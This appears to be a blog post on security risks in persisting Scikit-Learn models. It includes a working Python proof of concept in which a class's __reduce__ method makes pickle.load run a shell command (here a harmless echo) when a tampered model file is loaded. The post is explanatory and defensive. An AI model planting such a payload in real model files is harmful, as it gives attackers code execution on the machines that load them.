Some weeks ago, during a security training for developers given by Marcus from Hackmanit (by the way, it's a very good course that covers topics ranging from web development to NoSQL vulnerabilities and defensive coding), we discussed white-box attacks on web applications (i.e. attacks where the offender has internal access to the object). That made me curious to check whether similar vulnerabilities exist in ML models. After running a simple script using Scikit-Learn, I noticed there are latent vulnerabilities not only in the serialized objects themselves but also in the lack of a proper security mindset when we develop ML models. But first, let's look at a simple example.
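As a minimal sketch of the kind of white-box vulnerability I mean (assuming, as is common with Scikit-Learn, that the trained model is persisted with Python's `pickle` module), here is how an attacker with write access to the model artifact can make arbitrary code run the moment the victim loads the "model". The class name `MaliciousModel` and the file path are hypothetical, for illustration only:

```python
import os
import pickle
import tempfile

# Pickle calls an object's __reduce__ during deserialization, so a
# malicious payload can make pickle.load() invoke any callable it wants.
class MaliciousModel:
    def __reduce__(self):
        # os.system runs the moment the file is unpickled.
        return (os.system, ("echo pwned: code ran during model loading",))

# Step 1: the attacker overwrites the persisted model artifact.
path = os.path.join(tempfile.mkdtemp(), "model.pkl")
with open(path, "wb") as f:
    pickle.dump(MaliciousModel(), f)

# Step 2: the victim innocently "loads the trained model" --
# the shell command above executes before load() even returns.
with open(path, "rb") as f:
    model = pickle.load(f)
```

Note that `model` is not an estimator at all after loading; the attack happens during deserialization itself, which is why the pickle documentation warns against unpickling data from untrusted sources.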
For anyone who struggles with Scikit-Learn's syntax, the folks at DataCamp made a definitive cheat sheet covering all the main syntactic constructs of the API.
When we talk about machine learning tools, the triad TensorFlow, Scikit-Learn, and Spark MLlib immediately comes to mind.